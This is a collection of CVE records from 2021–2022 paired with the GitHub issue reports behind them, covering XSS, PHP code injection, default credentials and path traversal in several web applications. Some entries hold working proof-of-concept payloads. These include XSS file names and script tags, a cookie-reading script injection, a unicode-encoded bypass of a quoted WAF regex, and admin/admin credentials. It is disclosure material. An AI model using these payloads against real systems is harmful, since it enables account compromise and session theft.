https://youtu.be/aNq_CM_tmHw
Note : youtube videos is unlisted video .So noone can see ,except who has video link. | Cross Site Scripting Vulnerability On Feehi CMS | https://api.github.com/repos/liufee/cms/issues/58/comments | 0 | 2021-07-03T13:16:11Z | 2021-07-03T13:16:11Z | https://github.com/liufee/cms/issues/58 | 936,253,428 | 58 | 4,509 |
CVE-2021-36573 | 2022-12-15T19:15:15.913 | File Upload vulnerability in Feehi CMS thru 2.1.1 allows attackers to run arbitrary code via crafted image upload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/59"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/59"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BC1BB163-E338-4110-A6B8-0AF9510EDE25",
"versionEndExcluding": null,
"versionEndIncluding": "2.1.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/59 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | Hi i found cross site scripting vulnerability on Feehi CMS via image upload.
POC:
1. Go to https://demo.cms.feehi.com/admin/index.php?r=article%2Fupdate&id=postid
2. Click on text editor and upload image with file name "><img src=x onerror=alert(1)>.jpg
3. You got alert
https://youtu.be/c3j-NZY65fQ
| Cross Site Scripting On Image Upload Via File Name | https://api.github.com/repos/liufee/cms/issues/59/comments | 0 | 2021-07-03T14:02:37Z | 2021-07-03T14:02:37Z | https://github.com/liufee/cms/issues/59 | 936,261,083 | 59 | 4,510 |
CVE-2021-39426 | 2022-12-15T19:15:15.967 | An issue was discovered in /Upload/admin/admin_notify.php in Seacms 11.4 allows attackers to execute arbitrary php code via the notify1 parameter when the action parameter equals set. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/seacms-com/seacms/issues/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/seacms-com/seacms/issues/21"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seacms:seacms:11.4:*:*:*:*:*:*:*",
"matchCriteriaId": "97651271-838D-4FC6-ACF1-A462E7C4E082",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/seacms-com/seacms/issues/21 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"seacms-com",
"seacms"
] | In '/Upload/admin/admin_notify.php' lines 5 to 26

When action=set
The variable $notify1 takes the value from the post array and writes it to the '/ data / admin / notify. PHP' file as PHP code
Try closing the preceding double quotation marks with double quotation marks to write PHP code
Construct payload variable $notify1 = "? > <? php phpinfo();?><?

Arbitrary code can be executed | SeaCMS (2021-08-18) is a vulnerability that can cause rce | https://api.github.com/repos/HuaQiPro/seacms/issues/21/comments | 1 | 2021-08-18T01:56:35Z | 2021-08-23T09:18:30Z | https://github.com/HuaQiPro/seacms/issues/21 | 973,201,145 | 21 | 4,511 |
CVE-2021-39427 | 2022-12-15T19:15:16.017 | Cross site scripting vulnerability in 188Jianzhan 2.10 allows attackers to execute arbitrary code via the username parameter to /admin/reg.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vtime-tech/188Jianzhan/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vtime-tech/188Jianzhan/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vtimecn:188jianzhan:2.10:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9E7BC5-8E4B-4871-99F4-43C315F868B5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/vtime-tech/188Jianzhan/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"vtime-tech",
"188Jianzhan"
] | In '/admin/reg.php'

We can see that after the user and pwd parameters are obtained, the length of the user name and other characters are directly stored in the database without verification
Only the '/system/safe/360webscan. PHP' file is filtered in the middle!

The interception rules are as follows
$postfilter = "<.*=(&#\\d+?;?)+?>|<.*data=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|\\b(group_)?concat[\\s\\/\\*]*?\\([^\\)]+?\\)|\bcase[\s\/\*]*?when[\s\/\*]*?\([^\)]+?\)|load_file\s*?\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)|UPDATE\s*(\(.+\)\s*|@{1,2}.+?\s*|\s+?.+?|(`|'|\").*?(`|'|\")\s*)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|(`|'|\").*?(`|'|\"))FROM(\\(.+\\)|\\s+?.+?|(`|'|\").*?(`|'|\"))|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|<.*(iframe|frame|style|embed|object|frameset|meta|xml|a|img)";
We only need to set the user name to XSS code when registering,like
<input onfocus=\u0061\u006c\u0065\u0072\u0074(1)

The protection can be bypassed
Where onfocus attribute is' alert (1) 'after HTML encoding
This coding can bypass the detection and execute arbitrary JS code, which is triggered when the administrator clicks
After registration, you can see XSS in the background '/ admin / userlist. PHP' file


| 188Jianzhan V 2.10 XSS vulnerability exists | https://api.github.com/repos/vtime-tech/188Jianzhan/issues/4/comments | 1 | 2021-08-18T03:06:51Z | 2021-08-18T14:53:29Z | https://github.com/vtime-tech/188Jianzhan/issues/4 | 973,229,175 | 4 | 4,512 |
CVE-2022-40000 | 2022-12-15T19:15:22.480 | Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbitrary code via the username field of the admin log in page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/64"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/64"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:2.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DBEE4749-21CC-4336-8565-A05BC680EDF2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/64 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | Hi i found an xss vulnerability on Feehi CMS backend
What is XSS?
Attacker can inject and executee javascript code to webpage.

log in the user in the background

.png)
So attacker can inject javascript code into webpage using form request. | Cross Site Scripting Vulnerability On Feehi CMS | https://api.github.com/repos/liufee/cms/issues/64/comments | 2 | 2022-08-30T08:31:10Z | 2022-08-31T10:05:34Z | https://github.com/liufee/cms/issues/64 | 1,355,377,834 | 64 | 4,513 |
CVE-2022-40001 | 2022-12-15T19:15:22.567 | Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbitrary code via the title field of the create article page. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/65"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/65"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:2.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DBEE4749-21CC-4336-8565-A05BC680EDF2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/65 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | Hi i found an xss vulnerability on Feehi CMS backend
What is XSS?
Attacker can inject and executee javascript code to webpage.




| Cross Site Scripting Vulnerability On Feehi CMS | https://api.github.com/repos/liufee/cms/issues/65/comments | 2 | 2022-08-30T08:38:37Z | 2022-08-31T10:05:17Z | https://github.com/liufee/cms/issues/65 | 1,355,390,470 | 65 | 4,514 |
CVE-2022-40002 | 2022-12-15T19:15:22.640 | Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbirtary code via the callback parameter to /cms/notify. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/66"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/66"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:2.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DBEE4749-21CC-4336-8565-A05BC680EDF2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/66 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | Hi i found an xss vulnerability on Feehi CMS backend
What is XSS?
Attacker can inject and executee javascript code to webpage.


You can filter on the callback parameter | Cross Site Scripting Vulnerability On Feehi CMS | https://api.github.com/repos/liufee/cms/issues/66/comments | 0 | 2022-08-31T10:18:05Z | 2022-08-31T10:18:05Z | https://github.com/liufee/cms/issues/66 | 1,357,122,309 | 66 | 4,515 |
CVE-2022-40373 | 2022-12-15T19:15:22.730 | Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.1.1 allows remote attackers to run arbitrary code via upload of crafted XML file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/67"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liufee/cms/issues/67"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:feehi:feehicms:2.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DBEE4749-21CC-4336-8565-A05BC680EDF2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liufee/cms/issues/67 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liufee",
"cms"
] | Hi i found an xss vulnerability on Feehi CMS backend
What is XSS?
Attacker can inject and executee javascript code to webpage.

Then access this directory

| Unauthorized upload of XML file to execute XSS | https://api.github.com/repos/liufee/cms/issues/67/comments | 0 | 2022-09-07T08:01:39Z | 2022-09-07T08:01:39Z | https://github.com/liufee/cms/issues/67 | 1,364,257,597 | 67 | 4,516 |
CVE-2022-44235 | 2022-12-15T19:15:25.723 | Beijing Zed-3 Technologies Co.,Ltd VoIP simpliclty ASG 8.5.0.17807 (20181130-16:12) is vulnerable to Cross Site Scripting (XSS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liong007/Zed-3/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liong007/Zed-3/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zed-3:voip_simplicity_asg:8.5.0.17807:*:*:*:*:*:*:*",
"matchCriteriaId": "EE898CFF-BD4E-4637-8E5C-89C3FD638024",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/liong007/Zed-3/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liong007",
"Zed-3"
] | **Exploit Title:**VoIP simpliclty of Zed-3 is vulnerable to Cross Site Scripting (XSS)
**Company to which the vulnerability belongs:** Beijing Zed-3 Technologies Co.,Ltd
**Date:**10/20/2022
Vendor Homepage: www.zed-3.com
ASG Version: 8.5.0.17807 (20181130-16:12)
CVE-2022-44235
**Discoverer:**Yuan Lirong
**Attack vector(s):**
Beijing Zed-3 Technologies Co.,Ltd. is a high-tech enterprise founded by high-tech talents.
There is an XSS vulnerability in the VoIP simplilty developed by Beijing Zed-3 Technologies Co.,Ltd. An attacker can use this vulnerability to insert XSS execution code into the page "/login.php?pMessage=", perform pop-up operations, and obtain sensitive information such as user cookies.
**POC:**
</script><script>[window["location"]="javascript:alert(/xss/)"]</script>
And
</script><script>[window["location"]="javascript:alert(document.cookie)"]</script>
| VoIP simpliclty of Zed-3 is vulnerable to Cross Site Scripting (XSS) | https://api.github.com/repos/liong007/Zed-3/issues/1/comments | 0 | 2022-10-21T05:23:33Z | 2023-04-13T06:38:19Z | https://github.com/liong007/Zed-3/issues/1 | 1,417,762,919 | 1 | 4,517 |
CVE-2022-44236 | 2022-12-15T19:15:25.783 | Beijing Zed-3 Technologies Co.,Ltd VoIP simpliclty ASG 8.5.0.17807 (20181130-16:12) has a Weak password vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liong007/Zed-3/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liong007/Zed-3/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zed-3:voip_simplicity_asg:8.5.0.17807:*:*:*:*:*:*:*",
"matchCriteriaId": "EE898CFF-BD4E-4637-8E5C-89C3FD638024",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"521"
] | 521 | https://github.com/liong007/Zed-3/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liong007",
"Zed-3"
] | **Exploit Title:**VoIP simpliclty of Zed-3 is vulnerable to Weak password
**Company to which the vulnerability belongs:** Beijing Zed-3 Technologies Co.,Ltd
**Date:**10/20/2022
**Vendor Homepage:** www.zed-3.com
**ASG Version:** 8.5.0.17807 (20181130-16:12)
CVE-2022-44236
**Discoverer:**Yuan Lirong
**Attack vector(s):**
Beijing Zed-3 Technologies Co.,Ltd. is a high-tech enterprise founded by high-tech talents.
VoIP simpliclty of Zed-3 is vulnerable to Weak password.
User is admin.Password is admin.
| VoIP simpliclty of Zed-3 is vulnerable to Weak password | https://api.github.com/repos/liong007/Zed-3/issues/2/comments | 0 | 2022-10-21T06:55:28Z | 2023-04-13T06:38:38Z | https://github.com/liong007/Zed-3/issues/2 | 1,417,848,084 | 2 | 4,518 |
CVE-2022-4526 | 2022-12-15T21:15:13.207 | A vulnerability was found in django-photologue up to 3.15.1 and classified as problematic. Affected by this issue is some unknown functionality of the file photologue/templates/photologue/photo_detail.html of the component Default Template Handler. The manipulation of the argument object.caption leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.16 is able to address this issue. The name of the patch is 960cb060ce5e2964e6d716ff787c72fc18a371e7. It is recommended to apply a patch to fix this issue. VDB-215906 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/richardbarran/django-photologue/commit/960cb060ce5e2964e6d716ff787c72fc18a371e7"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/richardbarran/django-photologue/issues/223"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.215906"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/richardbarran/django-photologue/commit/960cb060ce5e2964e6d716ff787c72fc18a371e7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/richardbarran/django-photologue/issues/223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.215906"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:django-photologue_project:django-photologue:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F9673561-FB49-418C-884E-01152D1AA143",
"versionEndExcluding": null,
"versionEndIncluding": "3.15.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/richardbarran/django-photologue/issues/223 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"richardbarran",
"django-photologue"
] | Hello 👋
I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@domiee13) has found a potential issue, which I would be eager to share with you.
Could you add a `SECURITY.md` file with an e-mail address for me to send further details to? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.
Looking forward to hearing from you 👍
(cc @huntr-helper) | Create SECURITY.md | https://api.github.com/repos/richardbarran/django-photologue/issues/223/comments | 3 | 2022-07-17T12:53:03Z | 2023-01-31T07:03:13Z | https://github.com/richardbarran/django-photologue/issues/223 | 1,307,089,565 | 223 | 4,519 |
CVE-2022-45969 | 2022-12-15T23:15:10.457 | Alist v3.4.0 is vulnerable to Directory Traversal, | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/alist-org/alist/issues/2449"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/alist-org/alist/issues/2449"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alist_project:alist:3.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "624E7FFC-03C9-4438-9806-46EE810B1141",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/alist-org/alist/issues/2449 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"alist-org",
"alist"
] | ### Please make sure of the following things
- [X] I have read the [documentation](https://alist.nn.ci).
- [X] I'm sure there are no duplicate issues or discussions.
- [X] I'm sure it's due to `alist` and not something else(such as `Dependencies` or `Operational`).
- [X] I'm sure I'm using the latest version
### Alist Version / Alist 版本
v3.4.0(It seems like this problem still exists in version 3.5.1)
### Driver used / 使用的存储驱动
Local
### Describe the bug / 问题描述
- A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path
- I created a user 'test' with file upload permission only and set its base path to '/test'
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203326713-4f749b56-d601-40a3-b0e5-67f5316cd6d3.png">
- My file directory structure is as follows
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203326838-52df5b42-617f-4f18-b6bc-39e80b61c54c.png">
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203326868-9299e394-2bed-4603-8899-ffdf48e4e97c.png">
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203327107-83a8e82d-f888-4dee-bf61-c48ccaaeb0e4.png">
- Login as 'test', found out that I am already in '/test'
<img width="1335" alt="image" src="https://user-images.githubusercontent.com/52377340/203327280-53501e5a-88e5-4bbd-8c1e-fb54bccbc1c1.png">
